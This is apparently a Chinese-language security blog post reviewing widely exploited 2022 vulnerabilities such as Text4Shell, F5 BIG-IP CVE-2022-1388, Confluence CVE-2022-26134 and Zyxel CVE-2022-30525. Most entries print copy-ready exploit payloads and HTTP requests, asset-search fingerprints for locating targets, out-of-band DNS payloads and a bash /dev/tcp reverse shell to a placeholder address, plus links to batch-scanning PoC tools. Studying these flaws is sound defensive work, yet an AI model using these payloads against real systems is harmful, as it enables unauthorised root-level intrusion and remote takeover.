banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

2022年十大被利用的漏洞

CVE-2021-44228(Log4Shell)#

CVE-2021-44228 是一款广受欢迎的 Apache Log4j 开源日志实用程序中的远程代码执行漏洞。

复现记录,之前 notion 中记录了apache log4j2 漏洞复现

CVE-2022-30190(Follina)#

CVE-2022-30190(非正式名称为 “Follina”)在 2022 年 5 月被披露,它是微软 Windows 支持诊断工具(MSDT)中的一个远程代码执行漏洞,允许远程攻击者在目标系统上执行任意 shell 命令。

工具地址:CVE-2022-30190-follina-Office-MSDT

image

image

CVE-2022-22965(Spring4Shell)#

CVE-2022-22965(Spring4Shell 或 SpringShell)是来自 VMware 的一种广泛使用的开源 Java 框架 Spring Framework 中的远程代码执行漏洞,以上面提到的 Log4Shell 漏洞命名。

image

image

CVE-2022-22965: Poc&Exp, 支持批量扫描,反弹 shell

CVE-2022-42889(Text4Shell)#

本地环境搭建测试,访问 88 端口

image

payload:

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

image

GET /text4shell/attack?search=%24%7Bscript%3ajavascript%3ajava.lang.Runtime.getRuntime().exec('touch%20/tmp/foo')%7D HTTP/1.1
Host: localhost:88
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

image

  • dns
%24%7Bdns%3Aaddress%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d
  • payload.txt
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

GitHub - sunnyvale-it/CVE-2022-42889-PoC: CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept
GitHub - karthikuj/cve-2022-42889-text4shell-docker: Dockerized POC for CVE-2022-42889 Text4Shell

CVE-2022-0609(Chrome zero-day )#

  • poc/exp:无

CVE-2022-1388(F5 BIG-IP )#

该漏洞影响 F5 BIG-IP 软硬件套件中的 BIG-IP iControl REST 身份验证组件;一旦被利用,允许未经身份验证的攻击者以 “root” 权限在 BIG-IP 网络设备上执行命令。

POST /mgmt/tm/util/bash HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
Content-type: application/json
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 42

{"command": "run", "utilCmdArgs": "-c id"}

CVE-2022-1388 F5 Big-IP RCE - PoC Exploit (Root Reverse Shell Pre-auth) - YouTube

CVE-2022-1388 F5 BIG-IP iControl REST RCE

CVE-2017-11882(Microsoft Office bug)#

CVE-2017-11882(通杀 Office 2003 到 2016)

CVE-2022-41082, CVE-2022-41040(ProxyNotShell)#

ProxyNotShell 指两个分别被编号为 CVE-2022-41082 和 CVE-2022-41040 的高危漏洞,允许访问 PowerShell Remoting 的远程用户在易受攻击的 Exchange 系统上执行任意代码或执行 SSRF 攻击。

CVE-2022-27925, CVE-2022-41352(Zimbra Collaboration Suite bugs)#

CVE-2022-27925 允许实现远程代码执行,而 CVE-2022-41352 可以被用来将任意文件上传到易受攻击的实例。

CVE-2022-26134(Atlassian Confluence RCE flaw)#

  • app:"ATLASSIAN-Confluence"

poc:

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

CVE-2022-26134
CVE-2022-26134 - Confluence Pre-Auth RCE

CVE-2022-30525(Zyxel RCE vulnerability)#

  • title="USG FLEX"
POST /ztp/cgi-bin/handler HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 130

{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping xxx.dnslog.cn;","data":"hi"}

反弹 shell 的 payload:

{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":";bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1';","data":"hi"}

GitHub - Henry4E36/CVE-2022-30525: Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)
Zyxel USG FLEX handler 远程命令执行漏洞 CVE-2022-30525

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.